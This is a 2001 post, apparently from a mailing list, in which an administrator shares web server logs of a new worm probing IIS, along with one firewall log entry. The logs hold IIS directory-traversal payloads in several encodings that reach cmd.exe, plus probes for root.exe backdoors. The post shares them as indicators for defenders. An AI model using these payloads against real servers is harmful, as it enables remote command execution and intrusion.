For anyone who is interested here is what this new worm's IIS exploits look like: 66.8.46.102 - - [18/Sep/2001:05:55:49 -1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 66.8.46.102 - - [18/Sep/2001:05:55:48 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 66.8.46.102 - - [18/Sep/2001:05:55:46 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 66.8.46.102 - - [18/Sep/2001:05:55:45 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 66.8.46.102 - - [18/Sep/2001:05:55:43 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 66.8.46.102 - - [18/Sep/2001:05:55:42 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 66.8.46.102 - - [18/Sep/2001:05:55:40 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 66.8.46.102 - - [18/Sep/2001:05:55:39 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 66.8.46.102 - - [18/Sep/2001:05:55:37 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 66.8.46.102 - - [18/Sep/2001:05:55:35 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 66.8.46.102 - - [18/Sep/2001:05:55:34 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 66.8.46.102 - - [18/Sep/2001:05:55:32 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 66.8.46.102 - - [18/Sep/2001:05:55:31 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 66.8.46.102 - - [18/Sep/2001:05:55:29 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 66.8.46.102 - - [18/Sep/2001:05:55:28 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 66.8.46.102 - - [18/Sep/2001:05:55:26 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 It also tried something that my firewall blocked. I am not sure what it did, but here is the IPF log entry: Sep 18 05:55:38 manapua ipmon[10789]: 05:55:38.251399 le0 @0:25 b 66.8.46.102,3365 -> 66.8.228.32,80 PR tcp len 20 40 -R IN Dusty "Linux is for people who hate Windows. BSD is for people that love unix."